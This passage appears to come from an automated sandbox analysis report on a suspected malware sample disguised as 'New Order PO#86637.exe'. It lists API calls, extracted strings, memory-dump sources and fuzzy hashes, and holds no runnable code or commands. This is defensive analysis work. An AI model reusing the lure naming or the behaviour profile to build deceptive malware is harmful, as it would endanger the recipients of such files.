                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: \$h
                                                                            • API String ID: 4104443479-677774858
                                                                            • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                            • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                            • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                            • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID: &
                                                                            • API String ID: 2931989736-1010288
                                                                            • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                            • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                            • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                            • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: \
                                                                            • API String ID: 4104443479-2967466578
                                                                            • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                            • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                            • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                            • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 00466825
                                                                            • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CrackInternet_wcslen
                                                                            • String ID: |
                                                                            • API String ID: 596671847-2343686810
                                                                            • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                            • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                            • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                            • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: '
                                                                            • API String ID: 3850602802-1997036262
                                                                            • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                            • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                            • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                            • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                            APIs
                                                                            • _strlen.LIBCMT ref: 0040F858
                                                                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                            • _sprintf.LIBCMT ref: 0040F9AE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$_sprintf_strlen
                                                                            • String ID: %02X
                                                                            • API String ID: 1921645428-436463671
                                                                            • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                            • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                            • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                            • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Combobox
                                                                            • API String ID: 3850602802-2096851135
                                                                            • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                            • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                            • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                            • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                            APIs
                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: LengthMessageSendTextWindow
                                                                            • String ID: edit
                                                                            • API String ID: 2978978980-2167791130
                                                                            • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                            • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                            • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                            • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemorySleepStatus
                                                                            • String ID: @
                                                                            • API String ID: 2783356886-2766056989
                                                                            • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                            • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                            • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                            • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: htonsinet_addr
                                                                            • String ID: 255.255.255.255
                                                                            • API String ID: 3832099526-2422070025
                                                                            • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                            • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                            • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                            • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                            APIs
                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: InternetOpen
                                                                            • String ID: <local>
                                                                            • API String ID: 2038078732-4266983199
                                                                            • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                            • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                            • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                            • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock_memmove
                                                                            • String ID: EA06
                                                                            • API String ID: 1988441806-3962188686
                                                                            • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                            • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                            • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                            • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: u,D
                                                                            • API String ID: 4104443479-3858472334
                                                                            • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                            • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                            • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                            • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: Error:
                                                                            • API String ID: 4104443479-232661952
                                                                            • Opcode ID: 47c0561e29c226fab9e20f11d30fc4033f42905d42d91430649e8e798f40a5ad
                                                                            • Instruction ID: e6e9f2aa443a554b8bda50df2a041f2c42dbd20d32390c21629c974d0e28b4a3
                                                                            • Opcode Fuzzy Hash: 47c0561e29c226fab9e20f11d30fc4033f42905d42d91430649e8e798f40a5ad
                                                                            • Instruction Fuzzy Hash: 2101EFB6200115ABC704DF49D981D6AF7A9FF88710708855AF819CB302D774FD20CBA4
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • wsprintfW.USER32 ref: 0045612A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend_mallocwsprintf
                                                                            • String ID: %d/%02d/%02d
                                                                            • API String ID: 1262938277-328681919
                                                                            • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                            • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                            • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                            • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                            APIs
                                                                            • InternetCloseHandle.WININET(?), ref: 00442663
                                                                            • InternetCloseHandle.WININET ref: 00442668
                                                                              • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleInternet$ObjectSingleWait
                                                                            • String ID: aeB
                                                                            • API String ID: 857135153-906807131
                                                                            • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                            • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                            • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                            • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                            APIs
                                                                            Strings
                                                                            • ^B, xrefs: 00433248
                                                                            • C:\Users\user\Desktop\New Order PO#86637.exe, xrefs: 0043324B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsncpy
                                                                            • String ID: ^B$C:\Users\user\Desktop\New Order PO#86637.exe
                                                                            • API String ID: 1735881322-362401725
                                                                            • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                            • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
